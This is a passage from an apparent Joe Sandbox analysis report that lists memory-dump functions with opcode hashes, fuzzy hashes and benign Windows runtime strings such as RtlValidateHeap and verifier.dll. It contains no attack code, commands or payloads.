                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                            • API String ID: 0-3051831665
                                            • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction ID: 860e1505ab44600583bdd7de34526e3dd4b86f6f46cd292254322090913b4649
                                            • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                            • Instruction Fuzzy Hash: 9A318B72900219ABDF11DFA6CC45EEEBBFDEB84764F004025E904AB2A0D730DA05CBA5
                                            Function 369474B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: RtlValidateHeap
                                            • API String ID: 3446177414-1797218451
                                            • Opcode ID: 5079134c512e699ca8a0fb6cdefb2b449c8ca7330ffa64c0a6a3366a36bbae56
                                            • Instruction ID: e864bdca674b509f789ed5cbe1868d7114085ceb8434fb740e107f0d94c8ee63
                                            • Opcode Fuzzy Hash: 5079134c512e699ca8a0fb6cdefb2b449c8ca7330ffa64c0a6a3366a36bbae56
                                            • Instruction Fuzzy Hash: 0C412476E003999FEB02DF64CC947BDBBF6BF40254F248259D811AF281CB349905DBA1
                                            Function 369F705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: kLsE
                                            • API String ID: 3446177414-3058123920
                                            • Opcode ID: e7dd15a14bf9a41f7ef659e6c532d5eefcb17bb6b06d0f8fc11d9c3bba9a06f3
                                            • Instruction ID: 7b4e007476cedee46935606d6029a57030db01aad689a3f9d8ef88a758aabc77
                                            • Opcode Fuzzy Hash: e7dd15a14bf9a41f7ef659e6c532d5eefcb17bb6b06d0f8fc11d9c3bba9a06f3
                                            • Instruction Fuzzy Hash: 8A417871A1134046E712DB28DD88B657BA9EB00765F321128EF50AE2C2CBB74C97C7A2
                                            Function 369652A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$@
                                            • API String ID: 0-149943524
                                            • Opcode ID: 832f1df3845af55fa0c56ea7cec7d180887657cdbbd607e782b33fc55add88b9
                                            • Instruction ID: b0682771704e64a9f7055ef6e8b0c09d67ce61a5677b413d05786949f74d6f25
                                            • Opcode Fuzzy Hash: 832f1df3845af55fa0c56ea7cec7d180887657cdbbd607e782b33fc55add88b9
                                            • Instruction Fuzzy Hash: B632A2B49083118BDB24CF16C980B7EB7E5EF847A8F60491EF985972A0E774D854CB92
                                            Function 36955702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: c16b4e95662f3d8890220c9bbfb7de65fb5ddbbc14bdf8dad5e33de01b160ba7
                                            • Instruction ID: a4d2591d3f9ec5259d3718293204bff10222ef95b9b5cd05c565f184bd4c4981
                                            • Opcode Fuzzy Hash: c16b4e95662f3d8890220c9bbfb7de65fb5ddbbc14bdf8dad5e33de01b160ba7
                                            • Instruction Fuzzy Hash: EC31DE35615B12EFEB55CF24CE80A89FBA9FF44358F129025EA0447A52DB70ED21CBD1
                                            Function 3696F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$$
                                            • API String ID: 3446177414-233714265
                                            • Opcode ID: 382a620d5be5e04ae998bc7ae2ae89cdf5e1d2eafce4e2b09409f86f36b6b111
                                            • Instruction ID: db65fa63b8c3394797cc73331b975e801be016123c3609cea2bc63c4dd332f53
                                            • Opcode Fuzzy Hash: 382a620d5be5e04ae998bc7ae2ae89cdf5e1d2eafce4e2b09409f86f36b6b111
                                            • Instruction Fuzzy Hash: 7361DC71E00749DBEB20CFA6C980BACB7B6FF04328F204069D6156B652DB34AD46CB91
                                            Function 369E35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                            • API String ID: 0-118005554
                                            • Opcode ID: 8075a19d36eaf66047bad6e2341ff33a99c73a441eaa2a1bb15f06f23353b6f0
                                            • Instruction ID: bbde1d2d117f52860af67f81ce1e18fcd0302f74aba13ca91c3f43acb6e9f5ac
                                            • Opcode Fuzzy Hash: 8075a19d36eaf66047bad6e2341ff33a99c73a441eaa2a1bb15f06f23353b6f0
                                            • Instruction Fuzzy Hash: 2D3100756087819FD302CF3AD855B1AB3E8EF89B54F10286AF940CB391EB30D905CB92
                                            Function 3698329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local\$@
                                            • API String ID: 0-380025441
                                            • Opcode ID: 1486968b6c7058fe3b709889a3069069fe381ecbf5e71edc4be62866780dbb26
                                            • Instruction ID: 12a8917917af03d5e92a9d0f785132494c098910a40b176d4b89f77fe10ca64b
                                            • Opcode Fuzzy Hash: 1486968b6c7058fe3b709889a3069069fe381ecbf5e71edc4be62866780dbb26
                                            • Instruction Fuzzy Hash: 8831B5B55093049FE311CF69C880A5BBBE8FB89698F90092FF99887211DA34DD05CBD3
                                            Function 369834B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 369C2A95
                                            • RtlpInitializeAssemblyStorageMap, xrefs: 369C2A90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                            • API String ID: 0-2653619699
                                            • Opcode ID: 8ce002f7d5a1bb6e6dfdcc89ecd80e79d905118cc2a5e95e0d5d8072b19a0a86
                                            • Instruction ID: ac091ac979c572e12d0dfb91b51bb1f4a72c14e0f5afe4c55315bf1ab7dfff89
                                            • Opcode Fuzzy Hash: 8ce002f7d5a1bb6e6dfdcc89ecd80e79d905118cc2a5e95e0d5d8072b19a0a86
                                            • Instruction Fuzzy Hash: F6112976B00314BBF725CA998D41F5B77AD9BC8B68F2480697A04EF290D675CD00C6E5
                                            Function 36951131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: a54869a98e0e4dbf1972a5a8b65311a107c91920773a799ed47c494aad345eff
                                            • Instruction ID: 3d45dbabcc875dfc0661905f856389757f8297aae738c4d20a82334ba65b1052
                                            • Opcode Fuzzy Hash: a54869a98e0e4dbf1972a5a8b65311a107c91920773a799ed47c494aad345eff
                                            • Instruction Fuzzy Hash: 5FB111B5A083408FD354CF29C980A5AFBE1BF88304F544A6EE999C7352D731E845CB82
                                            Function 36957370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7cae1908a3827adf9aafa56c770f6ee07da79784b24b5fd3d0f8a54fd36e6fc
                                            • Instruction ID: 57264104ff05fb2cb54a4bd012081c299ee9873a252ee3ee90f5b15d5f179321
                                            • Opcode Fuzzy Hash: c7cae1908a3827adf9aafa56c770f6ee07da79784b24b5fd3d0f8a54fd36e6fc
                                            • Instruction Fuzzy Hash: 2FA17075A04341CFE311CF29C884A1ABBEAFF88754F21496DF6859B351DB30EA45CB92
                                            Function 36957703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69b68b91fc021d5154c0e59b6c535979e0916fb449571651b45d566bb1834b14
                                            • Instruction ID: acddaf6fc7f52d5698a1e41985e1dfd358506f3baf9013dda873ca89034bb59b
                                            • Opcode Fuzzy Hash: 69b68b91fc021d5154c0e59b6c535979e0916fb449571651b45d566bb1834b14
                                            • Instruction Fuzzy Hash: 45618175E00605EFEB08CF69C884A9DFBB5FF48244F25816AD619AB301DB30AE51CBD1
                                            Function 3698F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 180bd240c417c9f9bb6df0feacc047dc934df4678be0afae83540b2876f94347
                                            • Instruction ID: c4a87deca9f0da84284375d3fed51346b7add4bd99d538e2a6a43e5ebd540541
                                            • Opcode Fuzzy Hash: 180bd240c417c9f9bb6df0feacc047dc934df4678be0afae83540b2876f94347
                                            • Instruction Fuzzy Hash: EA411CB4D01288DFDB11CFAAC880AAEBBF9FB49350F60826ED555A7211D7319945CF60
                                            Function 3694B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: fcefe384468d2bd29dc62219e2432a45f05835788d4238118c8386f249d84988
                                            • Instruction ID: 9b22ac41885bb2736f205f7f0229d68cc61134150f07a0d8b9938e9f42abf9e5
                                            • Opcode Fuzzy Hash: fcefe384468d2bd29dc62219e2432a45f05835788d4238118c8386f249d84988
                                            • Instruction Fuzzy Hash: 3E31F472900304AFD712EF18C840A56B7B9EF453A4F60466AED549F295DB31ED42CBD0
                                            Function 369557C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 59f9a971c4d5c2126a753ec0eaa792cc9ae0b19be9011fdc07cc46189b4082ab
                                            • Instruction ID: 934f9e5d96718171cd91831c1f2cfcecdccf44ab28326f4931be2463d85fff40
                                            • Opcode Fuzzy Hash: 59f9a971c4d5c2126a753ec0eaa792cc9ae0b19be9011fdc07cc46189b4082ab
                                            • Instruction Fuzzy Hash: F2319C35A25A05BFEB41CB25CE50A89BBA6FF44254F61A025EA0087B51DB31ED30CBC1
                                            Function 36953616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: f967f4cb7864ef563d13950bca6610d31a2e4b07023aab0603dbffdf75bdfff3
                                            • Instruction ID: 9a83efa125c0fd83efd73abc9c44c79d022c0cb9c715582438e10a6697b65d19
                                            • Opcode Fuzzy Hash: f967f4cb7864ef563d13950bca6610d31a2e4b07023aab0603dbffdf75bdfff3
                                            • Instruction Fuzzy Hash: CB21363550A3509FDB22DF05CD44B16BBA8FF88724F62155DEA404B741E674EC04CB82
                                            Function 369492FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 4c915a6657788bbd07435f70ffaf5df0ec9f34d155bc641a9dc8397699abfce2
                                            • Instruction ID: 554d1f6d37a5dab7ee22b8df1664114d2b2883c3b70587676ea29d634653dd98
                                            • Opcode Fuzzy Hash: 4c915a6657788bbd07435f70ffaf5df0ec9f34d155bc641a9dc8397699abfce2
                                            • Instruction Fuzzy Hash: CBF0F032108340ABD732EB09CC04F8ABBEDEF85750F180119B54693191C6A1B905C660
                                            Function 369FDEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            • System Volume Information, xrefs: 369FDEBE
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: System Volume Information
                                            • API String ID: 0-764423717
                                            • Opcode ID: 63d8ac069c3901b8f0e6c5146a10c885482acf94d76eee28b4d0db7ea4ba95ec
                                            • Instruction ID: 813e61810a83de08de4f8f79daa3c3466f4b22a7a8ec47ed7458b05a585a6c87
                                            • Opcode Fuzzy Hash: 63d8ac069c3901b8f0e6c5146a10c885482acf94d76eee28b4d0db7ea4ba95ec
                                            • Instruction Fuzzy Hash: E661AC71118315AFD321DF51CC80EABB7E9EF98B94F01082DF9819B2A1D675DD48CB92
                                            Function 3695973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction ID: 2ff20ae91fe7620f1d5e59ceb23ba6b29e523099f4233187ffdebbf92a9658a6
                                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                            • Instruction Fuzzy Hash: 73615B75D01259AFEF11CF96C840BEEBBB8EF84754F21412AEA14AB250D7749A00CBA1
                                            Function 369DF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction ID: 97014d742b9ec4a8a2e5a94ca14ddb883d9442404b1c5dd0ae01af5e2bfa6ce1
                                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                            • Instruction Fuzzy Hash: AE5187B2914705AFE721CF15CC51F6AB7E8FB88794F504939B9809B290DBB4ED04CB92
                                            Function 36983EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction ID: 8699256100886c6f151d58d200822eab0e8ddd2a47b842c431f8cbe2b8013105
                                            • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                            • Instruction Fuzzy Hash: 03519F71505710AFD321CF55C840A6BB7F8FF88B14F00892EF9959B6A0E7B4D904CBA6
                                            Function 36A0B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            • Opcode ID: 2ef04d6c99b3254692ad0e1a74f266563651bc0ef19895534593d965ffe9420d
                                            • Instruction ID: c113201e38f8d330215c5e082e771aa0118f7e6d802d27e29d106b2f18ec7f43
                                            • Opcode Fuzzy Hash: 2ef04d6c99b3254692ad0e1a74f266563651bc0ef19895534593d965ffe9420d
                                            • Instruction Fuzzy Hash: 2241F176D00219AFDB01CA95DD40BEEB3F9EF48758F210126ED01EB650DA31DE00CBA2
                                            Function 369D97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: verifier.dll
                                            • API String ID: 0-3265496382
                                            • Opcode ID: f52cfd16e73bc3a08ab93117d7d543da9e33ca908f8ca71e1d06ebffc5a97426
                                            • Instruction ID: 37c50580a528527b3f5203dee74e81f406697d65b494ac80bdda9a7ec0cb7144
                                            • Opcode Fuzzy Hash: f52cfd16e73bc3a08ab93117d7d543da9e33ca908f8ca71e1d06ebffc5a97426
